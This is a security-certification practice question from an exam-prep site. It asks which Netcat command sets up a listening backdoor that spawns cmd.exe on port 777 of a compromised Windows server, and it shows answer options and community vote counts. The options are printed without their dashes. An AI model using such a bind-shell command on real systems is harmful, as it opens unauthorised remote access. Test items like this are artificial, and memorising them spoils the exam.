nerdexam
Mile2_Security

MK0-201 · Question #224

Using Netcat what would be the syntax to setup a listening back door from a compromised Windows Server that will spawn a shell when connecting to the remote server on port 777?

The correct answer is A. nc l p 777 e cmd.exe. See the full explanation below for the reasoning.

Question

Using Netcat what would be the syntax to setup a listening back door from a compromised Windows Server that will spawn a shell when connecting to the remote server on port 777?

Options

  • Anc l p 777 e cmd.exe
  • Bnc sh p 777 e cmd.exe
  • Cnc l p 777 sh cmd.exe
  • Dnc l p 777 exec cmd.exe

How the community answered

(30 responses)
  • A
    80% (24)
  • B
    3% (1)
  • C
    10% (3)
  • D
    7% (2)

Community Discussion

No community discussion yet for this question.

Full MK0-201 Practice